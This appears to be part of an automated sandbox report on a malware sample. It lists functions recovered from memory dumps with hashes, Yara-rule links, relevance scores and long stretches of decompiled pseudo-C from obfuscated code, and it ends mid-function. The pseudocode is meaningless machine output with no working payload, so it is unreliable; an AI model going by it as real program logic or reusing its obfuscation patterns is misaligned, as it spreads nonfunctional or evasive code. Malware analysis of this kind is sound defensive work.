                                      • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041DD04, Relevance: .4, Instructions: 398COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0041DD04(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _t52;
				signed int _t57;
				signed int _t60;
				signed int _t61;
				signed char _t72;
				signed int _t87;
				signed int _t90;
				signed int _t92;
				signed int _t99;
				signed int _t102;
				signed int _t103;
				signed int _t105;
				void* _t106;
				intOrPtr _t107;
				void* _t110;
				signed int _t112;

				_push(__esi);
				 *0xc5be2719 =  *0xc5be2719 ^ __ecx;
				_t90 = __edi -  *0x79195767;
				_push( *0x2306ca16);
				asm("sbb dh, 0x20");
				_t60 = __ebx +  *0x54dca1e7;
				_push(_t90);
				 *0x5d0e799b =  *0x5d0e799b << 0x81;
				 *0xb0a3182f = __edx;
				asm("sbb dl, [0x88d71238]");
				_t52 = __eax &  *0xf1827c98 &  *0x9f121097;
				 *0xc58478d3 = _t90;
				 *0xe4282ebf =  *0xe4282ebf & _t60;
				asm("sbb dh, [0x12f9eba2]");
				 *0x19e5a66f =  *0x19e5a66f & _t52;
				 *0x905d2c37 =  *0x905d2c37 << 0x15;
				asm("rol dword [0xbf8a1ec2], 0xf4");
				 *0xa2e42819 =  *0xa2e42819 + _t60;
				_t79 = __edx ^ 0x000000b5 ^  *0xf50ff9eb;
				_t61 = _t60 + 1;
				_t99 = __esi + 1;
				asm("sbb edi, [0x26a921da]");
				L1();
				 *0x9f3f70e8 =  *0x9f3f70e8 + _t110;
				 *0xe3e88510 =  *0xe3e88510 | _t52;
				_t92 =  *0xc58478d3 |  *0x2f8f6562;
				 *0xf5f9b4a2 =  *0xf5f9b4a2 >> 0x4e;
				 *0xcf2715f7 =  *0xcf2715f7 << 0x46;
				 *0x410944d3 =  *0x410944d3 | _t92;
				 *0xd5910db7 =  *0xd5910db7 >> 0xee;
				asm("adc edx, 0xd1eb0fb9");
				asm("adc dl, 0x80");
				asm("movsb");
				 *0x2df1188a =  *0x2df1188a << 0x93;
				 *0x2e1dbaa9 =  *0x2e1dbaa9 - _t110 + 0xe0f77edf;
				_t72 =  *0x16de6a31;
				 *0x16de6a31 = __ecx +  *0xe1ce8abb & 0x00000086 ^  *0xfec30913;
				 *0x9ff35f04 =  *0x9ff35f04 + _t72;
				_t112 =  *0xeeede217;
				if( *0xd946b780 <= _t52) {
					asm("sbb [0x1cc60783], esi");
					 *0x32816283 =  *0x7e653a77;
					 *0xc9f246d3 =  *0xc9f246d3 << 0x62;
					if( *0xc9f246d3 >= 0) {
						goto L1;
					}
					__esi =  *0x90752e73;
					__ch = __ch ^ 0x0000000a;
					__eax = __eax +  *0x5549d809;
					__ebx = __ebx - 0x9d15c01d;
					__esp = __esp - 0x5e14d966;
					_pop(__eax);
					asm("lodsd");
					 *0x825aa1ec =  *0x825aa1ec << 0x60;
					__ah =  *0xed4536b4;
					__ebx =  *0x30373760 * 0x4b35;
					asm("rol byte [0x11faa80c], 0xda");
					_push(__ecx);
					if(__ebx < 0) {
						goto L1;
					}
					 *0xb61088d5 =  *0xb61088d5 | __eax;
					 *0xc2327fcb =  *0xc2327fcb >> 2;
					asm("sbb [0xff990e94], edi");
					 *0x9ed90819 =  *0x9ed90819 << 0xe8;
					asm("ror byte [0x2b34c0b5], 0xb8");
					if( *0x9ed90819 != 0) {
						goto L1;
					}
					__esp = __esp - 0x6cec1a75;
					asm("rol dword [0x9b92530b], 0xb7");
					 *0x5a57aef6 =  *0x5a57aef6 >> 0x20;
					__ecx = __ecx ^ 0xefe96e13;
					_t25 = __ebx;
					__ebx =  *0x1efd6f6f;
					 *0x1efd6f6f = _t25;
					_t26 = __esp;
					__esp =  *0xe5dca19f;
					 *0xe5dca19f = _t26;
					 *0x9ff36910 =  *0x9ff36910 << 0x54;
					__bh = __bh ^  *0xd946b780;
					__ebx =  *0x1efd6f6f - 0x2edd770e;
					asm("adc [0xa76774e4], dl");
					asm("adc ebp, [0x752b34c2]");
					 *0x166cec1a =  *0x166cec1a << 0xb4;
					__eax = 0xba11d62b;
					__ah = __ah &  *0x4aa557b7;
					 *0xf93a1a0c =  *0xf93a1a0c << 0x38;
					 *0x155863ef =  *0x155863ef << 0xfc;
					_pop(__esi);
					asm("sbb [0xf591938], al");
					_t29 = __edi;
					__edi =  *0x1b8a8c1b;
					 *0x1b8a8c1b = _t29;
					_push(__ecx);
					 *0x2152cf6c =  *0x2152cf6c << 0xdb;
					 *0x15f026cc =  *0x15f026cc >> 0x87;
					if( *0x2152cf6c >= 0) {
						goto L1;
					}
					 *0x9b973b73 = __ebx;
					__edx = __edx +  *0x33181bfc;
					if(__al > 0x28) {
						goto L1;
					}
					 *0x3abe9a77 =  *0x3abe9a77 ^ __edi;
					if( *0x3abe9a77 >= 0) {
						goto L1;
					}
					__esi = __esi & 0x2dbb7173;
					 *0xf948f824 =  *0xf948f824 + __ah;
					__esp = __esp | 0x53c168f4;
					asm("stosd");
					asm("sbb edx, 0xf6ab3916");
					asm("sbb [0xc6af6ab0], dl");
					asm("adc [0x86248a13], eax");
					asm("sbb dh, 0xf9");
					if(0x11152127 > 0) {
						goto L1;
					}
					__esp =  *0x4be13f7f * 0x182f;
					asm("sbb ecx, [0x1238b0a3]");
					 *0x571add25 =  *0x571add25 << 0xf3;
					__ecx = __ecx |  *0x56d3c521;
					__esi =  *0xb99f9860 * 0x2822;
					asm("adc [0xf9eba2e4], ch");
					__edi = __edi ^  *0xcda6f51d;
					asm("sbb [0x81568df6], cl");
					__esp =  *0x4be13f7f * 0x182f -  *0x7abffcc1;
					_push( *0x8d87ead3);
					_push(__esi);
					asm("rol dword [0xc793081], 0x84");
					__edx =  *0x84fdf06b * 0xb87;
					 *0x161053c6 =  *0x161053c6 & __bh;
					__ecx = __ecx | 0x208b5e0d;
					__esp =  *0xa69af1a3;
					__dh = __dh & 0x000000f2;
					 *0xf77edff2 =  *0xf77edff2 << 0xb9;
					asm("adc [0xce18f7e0], dl");
					asm("stosd");
					_t36 = __cl;
					__cl =  *0xb0ab2ce3;
					 *0xb0ab2ce3 = _t36;
					asm("rol dword [0xe856b961], 0x6b");
					asm("ror dword [0x53c168f4], 0x5f");
					asm("stosd");
					__eax = 0xba11d62b -  *0xeda2450e;
					__ecx = __ecx ^  *0x1b2439a9;
					__ebx = 0x752b8227;
					_t37 = __dh;
					__dh =  *0xf6cec1a;
					 *0xf6cec1a = _t37;
					_push(__ecx);
					_push(__ecx);
					__esp =  *0xdda5df6f;
					__ebx =  *0x3f70e826;
					 *0x3f70e826 = 0x752b8227;
					__esi = __esi | 0x63251d9f;
					asm("sbb esi, [0x6bb8e5b8]");
					 *0xd0f49180 =  *0xd0f49180 >> 0x27;
					__bh = __bh &  *0x83df76b0;
					__dh =  *0xf6cec1a -  *0xaf1e1424;
					_push(0xba11d62b);
					__eax = 0xba11d62b -  *0xeda2450e |  *0xfed9ef3b;
					if(0xba11d62b < 0) {
						goto L1;
					}
					asm("adc eax, [0xeb133778]");
					asm("sbb ebp, [0xdd1bdd9d]");
					if(0xba11d62b < 0) {
						goto L1;
					}
					 *0x1a097b78 =  *0x1a097b78 << 0xfd;
					asm("cmpsb");
					__edx = __edx |  *0xa626d0de;
					__edi = __edi - 1;
					_push(0xd3909ccc);
					asm("movsw");
					__edx = __edx + 0x6c0dd93f;
					__eax = __eax ^ 0x8da0e9cf;
					_push(__esi);
					 *0x16793081 =  *0x16793081 & __edx;
					__dh = __dh +  *0x1c6f1d2a;
					asm("sbb [0x1b55401c], ch");
					asm("sbb ebp, [0x859770f]");
					_push(__esi);
					__ebx = __ebx ^  *0xb0a3182f;
					 *0x6dba1b38 =  *0x6dba1b38 & __dl;
					if( *0x6dba1b38 == 0) {
						goto L1;
					}
					__esp = __esp & 0x6f551ffa;
					if(__esp != 0) {
						goto L1;
					}
					_t43 = __esi;
					__esi =  *0x9938477b;
					 *0x9938477b = _t43;
					_push(__esp);
					 *0xc3387c15 =  *0xc3387c15 & 0xd3909ccc;
					 *0xfcb667a3 =  *0xfcb667a3 >> 0x71;
					__cl = __cl & 0x00000010;
					_t44 = __ebx;
					__ebx =  *0x1635930e;
					 *0x1635930e = _t44;
					__esp = __esp + 0x81111465;
					_push(0xd3909ccc);
					__cl = __cl ^ 0x000000e1;
					_push( *0xc35fa00e);
					__ecx = __ecx &  *0x12491636;
					__ebx =  *0x1635930e |  *0x182f2fbb;
					__esp = __esp - 0x1338b0a3;
					 *0x279a8b12 =  *0x279a8b12 >> 0xef;
					 *0x355f803d =  *0x355f803d | __ecx;
					asm("sbb esi, [0x809f1189]");
					__esi =  *0x9938477b + 1;
					 *0x48230fd9 = __esp;
					__edx = __edx - 1;
					__ebx = ( *0x1635930e |  *0x182f2fbb) - 1;
					_push(__esi);
					 *0x70e826fe =  *0x70e826fe ^ __esi;
					asm("adc [0x2e069f3f], edi");
					__eax = 0x2c9a61d1;
					__al = __al | 0x0000001a;
					return 0x2c9a61d1;
				}
				L1:
				 *0x2be5a709 = _t112;
				_t112 =  *0x2be5a709 ^  *0xc3b40dd9;
				_push(_t92);
				_t72 = _t72 + 0x00000001 ^ 0x00000032;
				_t92 =  *0x4a2e0bb;
				if(_t72 < 0) {
					_t92 = _t92 & 0xad2f0c79;
					 *0xb22aac33 =  *0xb22aac33 & _t61;
					asm("sbb [0xf3b49627], eax");
					_t99 = _t99 -  *0x750853c5;
					 *0x5ca43be =  *0x5ca43be & _t61;
					 *0x480dbdc0 = _t112;
					 *0xd2280d9c = _t72;
					asm("sbb dh, [0xb75a4fd7]");
					 *0x190698bf =  *0x190698bf >> 0xc;
					_t61 = _t61 + 1;
					_t72 =  *0xd2280d9c | 0x00000012;
					if(_t72 < 0) {
						asm("ror dword [0x2f5b1379], 0x40");
						asm("rcr byte [0x94b47604], 0x26");
						 *0x6fc802f8 =  *0x88239d69 * 0xccc2;
						asm("movsw");
						 *0x7d10d93c =  *0x7d10d93c & _t61;
						_t61 =  *0xaf35b028 &  *0x28e3611f;
						_pop(_t112);
						_t92 = _t92 -  *0xad561726;
						asm("ror dword [0x79c109d9], 0x97");
						 *0x80c7ee0e =  *0x80c7ee0e ^ _t61;
						asm("sbb [0x5d99a0c], al");
						 *0x669d42b4 = _t52;
						 *0xf0700a9c =  *0xf0700a9c >> 0x57;
						_t99 = _t99 |  *0xd95c87ff;
						 *0x4819e00a =  *0x4819e00a ^ _t61;
						_pop(_t52);
						asm("ror byte [0x8bdcc520], 0x41");
						_pop(_t102);
						_t79 =  *0x6fc802f8 ^  *0xd0b60fd9;
						asm("adc esp, [0xcfabdd37]");
						 *0x6760a6e4 =  *0x6760a6e4 |  *0x6fc802f8 ^  *0xd0b60fd9;
						if( *0x6760a6e4 < 0) {
							_push(0x547a129f);
							_t72 = _t72 | 0xffffffffffff6dfb;
							asm("sbb dl, 0x30");
							_t103 = _t102 |  *0xd73d462;
							_t52 = _t52 - 0x8a;
							if(_t52 >= 0) {
								_t72 =  *0xa3021e7c * 0xf9e3;
								_pop( *0x37b7f02b);
								asm("stosb");
								if(_t72 >= 0) {
									 *0xf0872570 =  *0xf0872570 | _t52;
									_t99 = _t99 + 1;
									_pop(_t79);
									_t61 =  *0x3d8b246e;
									 *0x2f44aec9 =  *0x2f44aec9 + _t79;
									_pop(_t112);
									asm("adc esp, [0xaa209899]");
									_t52 = _t52 + 0x00000001 & 0x0000002a;
									_t105 = (_t103 &  *0x77920b2d) + 1;
									_t92 =  *0xe56d1d31;
									L1();
									 *0x2926e8 =  *0x2926e8 >> 0xbb;
									_t72 = _t72 ^ 0x00000010;
									if(_t72 <= 0) {
										asm("adc edi, [0x76e59d13]");
										 *0xea911414 =  *0xea911414 + _t61;
										asm("rol dword [0xd90140fb], 0xdc");
										_t72 = _t72 + 1;
										asm("ror dword [0x88f06ed4], 0x93");
										asm("rcl dword [0xfcbc9b0b], 0xf1");
										asm("sbb ebx, [0x58670a3f]");
										 *0xc752a2ca =  *0xc752a2ca >> 0x7a;
										asm("adc ebx, 0x52382e8c");
										 *0x12fec0e1 =  *0x12fec0e1 ^ _t72;
										 *0xc73ea98 =  *0xc73ea98 | _t105;
										asm("sbb ebx, 0xa60d8edb");
										 *0xcca59d37 =  *0xcca59d37 ^ 0x847f4b97;
										asm("adc [0xc0649fba], eax");
										asm("adc [0xb6665193], eax");
										asm("lodsd");
										_t106 = _t105;
										 *0x3a10c86 =  *0x3a10c86 >> 8;
										_t112 =  *0x76e3a19a;
										 *0x76e3a19a =  *0x9c65557f * 0x68f5 - 1;
										 *0xbb0d2d3b =  *0xbb0d2d3b - _t106;
										asm("adc eax, [0xe57cabfd]");
										 *0x935ceec =  *0x935ceec - 0x847f4b97;
										asm("rol byte [0x4c492f32], 0x15");
										_push( *0x5dc8a407);
										_t99 =  *0x9065636b * 0x49be;
										asm("lodsd");
										_pop(_t87);
										_t61 = (0x000000e5 &  *0xae6ba087 ^  *0x4b0b741b) + 0x6b06fff5 ^ 0x7637760e;
										_t92 = 0x847f4b97 -  *0xecc757b9;
										 *0x7fcd3ef3 = _t72;
										_t79 =  *0xe6c0dfb;
										 *0xe6c0dfb = _t87;
										asm("rcl dword [0x428943f5], 0xad");
										asm("sbb ecx, [0x4f472f06]");
										asm("adc [0x793fa80d], edi");
										_t107 = _t106 -  *0x27126cf5;
										 *0x5fac7520 =  *0x5fac7520 << 0x6a;
										_t52 = 0x3ff632a0;
										if(0x3ff632c1 < 0) {
											_t79 = _t79 | 0x7ba6d579;
											_t99 =  *0xee40c56a * 0xe394;
											 *0x64bf12f9 =  *0x64bf12f9 & 0x3ff632a0;
											if( *0x64bf12f9 == 0) {
												asm("adc ebp, [0x78e7f075]");
												asm("lodsb");
												_push(_t72);
												asm("rcl dword [0xf4750365], 0xd5");
												 *0x9ff0e1e0 =  *0x9ff0e1e0 - _t79;
												 *0xdc0df9e2 =  *0xdc0df9e2 + _t72;
												 *0x84291b9f = _t107;
												 *0x82498499 =  *0x82498499 >> 0x7d;
												if( *0xdc0df9e2 < 0) {
													_t57 =  *0x10792f7d * 0xab04;
													_push(_t57);
													asm("sbb [0xe834e8ed], edi");
													_t52 = _t57 +  *0x272619dd | 0x77b8e9f7;
													_push( *0x376bdb9f);
													asm("sbb [0xdf1afd9c], esi");
													asm("sbb edx, [0xf9ba5dcb]");
													_t61 = (_t61 |  *0xc32612f7) - 1;
													asm("rcr dword [0x23c63edb], 0x7b");
													_t112 = _t112 -  *0x410cbdcf - 1;
													asm("sbb ch, 0x38");
													_t92 = _t92 &  *0x68386d17;
													L1();
													_t72 = _t72 +  *0x35f227b5 -  *0xf577c833;
													_t79 =  *0xba58908e;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}



















                                      0x0041dd04
                                      0x0041dd11
                                      0x0041dd17
                                      0x0041dd1d
                                      0x0041dd23
                                      0x0041dd26
                                      0x0041dd2c
                                      0x0041dd33
                                      0x0041dd3a
                                      0x0041dd40
                                      0x0041dd46
                                      0x0041dd4c
                                      0x0041dd55
                                      0x0041dd5b
                                      0x0041dd61
                                      0x0041dd67
                                      0x0041dd6e
                                      0x0041dd75
                                      0x0041dd7b
                                      0x0041dd81
                                      0x0041dd82
                                      0x0041dd89
                                      0x0041dd8f
                                      0x0041dd94
                                      0x0041dd9a
                                      0x0041dda0
                                      0x0041dda6
                                      0x0041ddb3
                                      0x0041ddba
                                      0x0041ddc3
                                      0x0041ddca
                                      0x0041ddd0
                                      0x0041ddd3
                                      0x0041ddd4
                                      0x0041dde1
                                      0x0041dde7
                                      0x0041dde7
                                      0x0041dded
                                      0x0041ddf9
                                      0x0041ddff
                                      0x0041de0b
                                      0x0041de11
                                      0x0041de17
                                      0x0041de1e
                                      0x00000000
                                      0x00000000
                                      0x0041de24
                                      0x0041de2a
                                      0x0041de2d
                                      0x0041de33
                                      0x0041de39
                                      0x0041de3f
                                      0x0041de40
                                      0x0041de41
                                      0x0041de48
                                      0x0041de4e
                                      0x0041de58
                                      0x0041de5f
                                      0x0041de60
                                      0x00000000
                                      0x00000000
                                      0x0041de71
                                      0x0041de77
                                      0x0041de7e
                                      0x0041de84
                                      0x0041de8b
                                      0x0041de92
                                      0x00000000
                                      0x00000000
                                      0x0041de98
                                      0x0041de9e
                                      0x0041deab
                                      0x0041deb2
                                      0x0041deb8
                                      0x0041deb8
                                      0x0041deb8
                                      0x0041debe
                                      0x0041debe
                                      0x0041debe
                                      0x0041dec4
                                      0x0041decb
                                      0x0041ded1
                                      0x0041ded7
                                      0x0041dedd
                                      0x0041dee3
                                      0x0041deea
                                      0x0041deef
                                      0x0041def5
                                      0x0041defc
                                      0x0041df03
                                      0x0041df0a
                                      0x0041df10
                                      0x0041df10
                                      0x0041df10
                                      0x0041df1c
                                      0x0041df1d
                                      0x0041df24
                                      0x0041df2b
                                      0x00000000
                                      0x00000000
                                      0x0041df31
                                      0x0041df37
                                      0x0041df45
                                      0x00000000
                                      0x00000000
                                      0x0041df4b
                                      0x0041df51
                                      0x00000000
                                      0x00000000
                                      0x0041df57
                                      0x0041df5d
                                      0x0041df66
                                      0x0041df6c
                                      0x0041df6d
                                      0x0041df73
                                      0x0041df7a
                                      0x0041df80
                                      0x0041df83
                                      0x00000000
                                      0x00000000
                                      0x0041df89
                                      0x0041df93
                                      0x0041df99
                                      0x0041dfa0
                                      0x0041dfa6
                                      0x0041dfb0
                                      0x0041dfbc
                                      0x0041dfc2
                                      0x0041dfce
                                      0x0041dfd4
                                      0x0041dfda
                                      0x0041dfdb
                                      0x0041dfe2
                                      0x0041dff2
                                      0x0041dff8
                                      0x0041dffe
                                      0x0041e004
                                      0x0041e007
                                      0x0041e00e
                                      0x0041e01a
                                      0x0041e021
                                      0x0041e021
                                      0x0041e021
                                      0x0041e02a
                                      0x0041e031
                                      0x0041e038
                                      0x0041e039
                                      0x0041e03f
                                      0x0041e045
                                      0x0041e04a
                                      0x0041e04a
                                      0x0041e04a
                                      0x0041e050
                                      0x0041e051
                                      0x0041e052
                                      0x0041e05e
                                      0x0041e05e
                                      0x0041e064
                                      0x0041e06a
                                      0x0041e070
                                      0x0041e07c
                                      0x0041e082
                                      0x0041e088
                                      0x0041e089
                                      0x0041e08f
                                      0x00000000
                                      0x00000000
                                      0x0041e095
                                      0x0041e09b
                                      0x0041e0a1
                                      0x00000000
                                      0x00000000
                                      0x0041e0a7
                                      0x0041e0ae
                                      0x0041e0af
                                      0x0041e0b5
                                      0x0041e0b6
                                      0x0041e0b7
                                      0x0041e0b9
                                      0x0041e0c5
                                      0x0041e0ca
                                      0x0041e0cb
                                      0x0041e0d1
                                      0x0041e0dd
                                      0x0041e0e3
                                      0x0041e0e9
                                      0x0041e0ea
                                      0x0041e0f0
                                      0x0041e0f6
                                      0x00000000
                                      0x00000000
                                      0x0041e102
                                      0x0041e108
                                      0x00000000
                                      0x00000000
                                      0x0041e10e
                                      0x0041e10e
                                      0x0041e10e
                                      0x0041e114
                                      0x0041e115
                                      0x0041e11b
                                      0x0041e122
                                      0x0041e125
                                      0x0041e125
                                      0x0041e125
                                      0x0041e12b
                                      0x0041e131
                                      0x0041e133
                                      0x0041e136
                                      0x0041e13c
                                      0x0041e142
                                      0x0041e148
                                      0x0041e154
                                      0x0041e15b
                                      0x0041e161
                                      0x0041e16a
                                      0x0041e16b
                                      0x0041e171
                                      0x0041e172
                                      0x0041e173
                                      0x0041e179
                                      0x0041e17f
                                      0x0041e185
                                      0x0041e18b
                                      0x0041e18d
                                      0x0041e18d
                                      0x0041d176
                                      0x0041d176
                                      0x0041d183
                                      0x0041d189
                                      0x0041d190
                                      0x0041d193
                                      0x0041d199
                                      0x0041d19b
                                      0x0041d1a1
                                      0x0041d1a7
                                      0x0041d1ad
                                      0x0041d1b9
                                      0x0041d1bf
                                      0x0041d1c5
                                      0x0041d1cb
                                      0x0041d1d1
                                      0x0041d1d8
                                      0x0041d1d9
                                      0x0041d1dc
                                      0x0041d1de
                                      0x0041d1ef
                                      0x0041d1f6
                                      0x0041d1fc
                                      0x0041d1fe
                                      0x0041d210
                                      0x0041d216
                                      0x0041d223
                                      0x0041d229
                                      0x0041d230
                                      0x0041d236
                                      0x0041d23c
                                      0x0041d241
                                      0x0041d24e
                                      0x0041d254
                                      0x0041d25a
                                      0x0041d25b
                                      0x0041d262
                                      0x0041d263
                                      0x0041d269
                                      0x0041d26f
                                      0x0041d275
                                      0x0041d281
                                      0x0041d286
                                      0x0041d28c
                                      0x0041d28f
                                      0x0041d295
                                      0x0041d298
                                      0x0041d29e
                                      0x0041d2a8
                                      0x0041d2ae
                                      0x0041d2af
                                      0x0041d2b5
                                      0x0041d2bb
                                      0x0041d2c2
                                      0x0041d2c3
                                      0x0041d2c9
                                      0x0041d2cf
                                      0x0041d2d6
                                      0x0041d2e3
                                      0x0041d2e6
                                      0x0041d2e7
                                      0x0041d2ed
                                      0x0041d2f2
                                      0x0041d2f9
                                      0x0041d2fc
                                      0x0041d313
                                      0x0041d319
                                      0x0041d330
                                      0x0041d337
                                      0x0041d338
                                      0x0041d33f
                                      0x0041d347
                                      0x0041d34d
                                      0x0041d35a
                                      0x0041d362
                                      0x0041d36d
                                      0x0041d373
                                      0x0041d379
                                      0x0041d37f
                                      0x0041d386
                                      0x0041d38c
                                      0x0041d393
                                      0x0041d3a0
                                      0x0041d3a8
                                      0x0041d3a8
                                      0x0041d3ae
                                      0x0041d3b4
                                      0x0041d3c0
                                      0x0041d3c6
                                      0x0041d3cd
                                      0x0041d3ec
                                      0x0041d3f6
                                      0x0041d3f7
                                      0x0041d3f8
                                      0x0041d3fe
                                      0x0041d404
                                      0x0041d40a
                                      0x0041d40a
                                      0x0041d410
                                      0x0041d417
                                      0x0041d41d
                                      0x0041d423
                                      0x0041d429
                                      0x0041d432
                                      0x0041d433
                                      0x0041d439
                                      0x0041d43f
                                      0x0041d449
                                      0x0041d44f
                                      0x0041d455
                                      0x0041d45b
                                      0x0041d45c
                                      0x0041d45d
                                      0x0041d464
                                      0x0041d46a
                                      0x0041d471
                                      0x0041d477
                                      0x0041d47e
                                      0x0041d484
                                      0x0041d494
                                      0x0041d49b
                                      0x0041d4a7
                                      0x0041d4ac
                                      0x0041d4b2
                                      0x0041d4b8
                                      0x0041d4be
                                      0x0041d4c5
                                      0x0041d4d2
                                      0x0041d4d3
                                      0x0041d4d6
                                      0x0041d4dc
                                      0x0041d4ed
                                      0x0041d4f3
                                      0x0041d4f3
                                      0x0041d47e
                                      0x0041d44f
                                      0x0041d433
                                      0x0041d2fc
                                      0x0041d2af
                                      0x0041d298
                                      0x0041d275
                                      0x0041d1dc
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 698d3b384b4427a7870e30c63ac01fdb13b264bfc66afbc66f84fd77ff7bdb23
                                      • Instruction ID: 27b29ba9539e1d5dec07f59d62448b49ca0c53db05f8c06638760e3aa1fb598d
                                      • Opcode Fuzzy Hash: 698d3b384b4427a7870e30c63ac01fdb13b264bfc66afbc66f84fd77ff7bdb23
                                      • Instruction Fuzzy Hash: 7C1296B2918781DFD706CF38C98AB413FB2F756720B08424EC5A1974E6D738256ACF89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00739116, Relevance: .3, Instructions: 290COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313075452.0000000000672000.00000002.00020000.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000003.00000002.313064796.0000000000670000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10ee7fd99db33d5c4ee670a43d13494417839fe590f176cb7b3c174d4c57970f
                                      • Instruction ID: 4f8c391ece3600610a93f36a26c4c69ff1af0f2c58e690b843011179ac4bc630
                                      • Opcode Fuzzy Hash: 10ee7fd99db33d5c4ee670a43d13494417839fe590f176cb7b3c174d4c57970f
                                      • Instruction Fuzzy Hash: 22B15FAB4DE7D62FC7036B30AC761847F21AD17119B1E42CBC8D4CA8ABD21C952DD726
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041DB48, Relevance: .3, Instructions: 265COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E0041DB48(signed int __eax, signed int __ebx, intOrPtr __ecx, signed int __edx) {
				signed int _t38;
				signed int _t43;
				signed int _t45;
				signed char _t53;
				signed int _t66;
				signed int _t68;
				signed int _t74;
				signed int _t77;
				signed int _t78;
				signed int _t80;
				void* _t81;
				intOrPtr _t82;
				void* _t85;
				signed int _t86;

				_t58 = __edx;
				_t45 = __ebx;
				_t74 =  *0x55caa760 * 0xc532;
				 *0x327fcb0c =  *0x327fcb0c >> 0x99;
				_push(0x431894c2);
				asm("adc eax, [0xfc2a3d3e]");
				asm("cmpsw");
				 *0x20847fe5 =  *0x20847fe5 | __eax;
				_t38 = __eax &  *0xb701a3bf;
				_t86 = _t85 +  *0xa7b3e9f;
				_t53 =  *0xc168f42c;
				 *0xc168f42c = __ecx;
				_push(__ebx);
				asm("stosd");
				if(( *0x4aefe5ef & __ebx) >= 0) {
					__esp = __esp -  *0xf9dace72;
					__eflags =  *0xe0f77edf & __eax;
					__eax = 0x579314f7;
					asm("stosb");
					if(__eflags != 0) {
						goto L1;
					}
					__esi = __esi +  *0x7cf0db75;
					__eflags = __esi;
					if(__esi < 0) {
						goto L1;
					}
					__ebx = __ebx ^  *0x6dfc572;
					_push(0x579314f7);
					0x579314f7 - 0x4b35608f =  *0x15faa80c & __dh;
					if(( *0x15faa80c & __dh) > 0) {
						goto L1;
					}
					__eax =  *0x8c230d7f * 0x1c23;
					__ebx =  *0x96001617;
					asm("movsb");
					__cl = __cl -  *0x2df1188a;
					__eax =  *0xd4c18211;
					__eflags =  *0x1ed7d7d7 & __al;
					_pop( *0xb21090d9);
					__eflags = __ecx -  *0xc2327fcb;
					__esi = __esi +  *0x1f0f1094;
					__eax =  *0xd4c18211 &  *0x1d201f1e;
					__edx = __edx - 1;
					asm("rcl dword [0x332b0885], 0xf7");
					 *0xe0f77edf =  *0xe0f77edf + __eax;
					__eflags = __ch & 0x00000000;
					asm("sbb bl, 0xb2");
					__esp = __esp + 1;
					asm("rol byte [0x129b823a], 0x33");
					 *0xad00116c =  *0xad00116c << 0x87;
					__esp = __esp +  *0x27fa37bb;
					 *0x4dddf3a =  *0x4dddf3a ^ __bl;
					asm("adc [0x58074406], eax");
					__eflags =  *0x1094b534 - __dl;
					_push( *0xe56a64d3);
					__eflags = __bl & 0x000000b4;
					_push( *0xc7373d0b);
					 *0x7edffad9 =  *0x7edffad9 << 0x4c;
					__eflags = __eax - 0xdf7e0f7;
					__edx = __edx ^  *0x70a4332d;
					__eflags = __edx;
					asm("rcl dword [0xbe01b623], 0x3f");
					asm("rcl dword [0x195767c5], 0x1d");
					if(__edx >= 0) {
						goto L1;
					}
					__edx = __edx | 0x99141279;
					__ch = __ch -  *0x24e013a8;
					asm("sbb al, 0x34");
					 *0x81eb6d2d =  *0x81eb6d2d >> 0xa3;
					__edx = 0xe4281fbd;
					 *0x18f9eba2 =  *0x18f9eba2 ^ __al;
					__eflags =  *0x18f9eba2;
					if( *0x18f9eba2 > 0) {
						goto L1;
					}
					 *0xb6322977 =  *0xb6322977 ^ __ebx;
					asm("rcr byte [0xb37b39b5], 0x5e");
					 *0x1fe23bb2 = __al;
					__eflags =  *0xe8398297 & __esi;
					asm("adc dh, 0x18");
					 *0xc168f4d4 =  *0xc168f4d4 & __eax;
					_push(__ebx);
					asm("stosd");
					__ah = __ah + 0x1a;
					__ebx = 0xde2fdeee;
					 *0x358361e5 =  *0x358361e5 + __ch;
					_push( *0x61d30905);
					__esi = __esi -  *0x49a3c566;
					__al = __al + 0xb5;
					_pop(__ecx);
					__eflags =  *0xe2d60c06 & __esi;
					return __eax;
				}
				L1:
				 *0x2be5a709 = _t86;
				_t86 =  *0x2be5a709 ^  *0xc3b40dd9;
				_push(_t68);
				_t53 = _t53 + 0x00000001 ^ 0x00000032;
				_t68 =  *0x4a2e0bb;
				if(_t53 < 0) {
					_t68 = _t68 & 0xad2f0c79;
					 *0xb22aac33 =  *0xb22aac33 & _t45;
					asm("sbb [0xf3b49627], eax");
					_t74 = _t74 -  *0x750853c5;
					 *0x5ca43be =  *0x5ca43be & _t45;
					 *0x480dbdc0 = _t86;
					 *0xd2280d9c = _t53;
					asm("sbb dh, [0xb75a4fd7]");
					 *0x190698bf =  *0x190698bf >> 0xc;
					_t45 = _t45 + 1;
					_t53 =  *0xd2280d9c | 0x00000012;
					if(_t53 < 0) {
						asm("ror dword [0x2f5b1379], 0x40");
						asm("rcr byte [0x94b47604], 0x26");
						 *0x6fc802f8 =  *0x88239d69 * 0xccc2;
						asm("movsw");
						 *0x7d10d93c =  *0x7d10d93c & _t45;
						_t45 =  *0xaf35b028 &  *0x28e3611f;
						_pop(_t86);
						_t68 = _t68 -  *0xad561726;
						asm("ror dword [0x79c109d9], 0x97");
						 *0x80c7ee0e =  *0x80c7ee0e ^ _t45;
						asm("sbb [0x5d99a0c], al");
						 *0x669d42b4 = _t38;
						 *0xf0700a9c =  *0xf0700a9c >> 0x57;
						_t74 = _t74 |  *0xd95c87ff;
						 *0x4819e00a =  *0x4819e00a ^ _t45;
						_pop(_t38);
						asm("ror byte [0x8bdcc520], 0x41");
